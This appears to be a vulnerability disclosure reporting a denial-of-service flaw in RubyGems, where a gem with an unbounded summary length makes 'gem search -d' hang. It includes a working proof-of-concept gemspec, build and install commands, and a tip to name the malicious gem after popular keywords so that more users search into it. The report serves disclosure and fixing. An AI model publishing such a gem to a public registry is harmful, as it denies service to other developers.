RubyGems: No limit of summary length allows Denail of Service

Currently, there is no limit for summary length. I think, pushing a gem whose summary is huge, will make gem search unavailable.

This is not Arbitrary Code Execution, but really easy to attack. According to CVSS v3.0 Calculator, the severity is High (7.5).

How to attack

1. An attacker creates a gem with huge summary string, and push it to rubygems.org.
2. A victim runs gem search -d <substring-of-the-name-of-the-gem>, but it will give no response.

It may be good for the gem name to include a frequently-searched keyword, such as “foo-rails-bar” or “foo-sinatra-bar”.

Proof of concept

1. Prepare the following gemspec.

Gem::Specification.new do |spec|
  spec.name     = "huge-summary"
  spec.version  = "0.0.1"
  spec.authors  = ["Yusuke Endoh"]
  spec.email    = ["[email protected]"]
  spec.summary  = "foo" * 10000000
  spec.homepage = "http://example.com/"
  spec.license  = "MIT"
end

2. Run the following commands

gem build huge-summary.gemspec
gem install huge-summary-0.0.1.gem

3. Run the following command.

gem query huge-summary -d

It will not answer.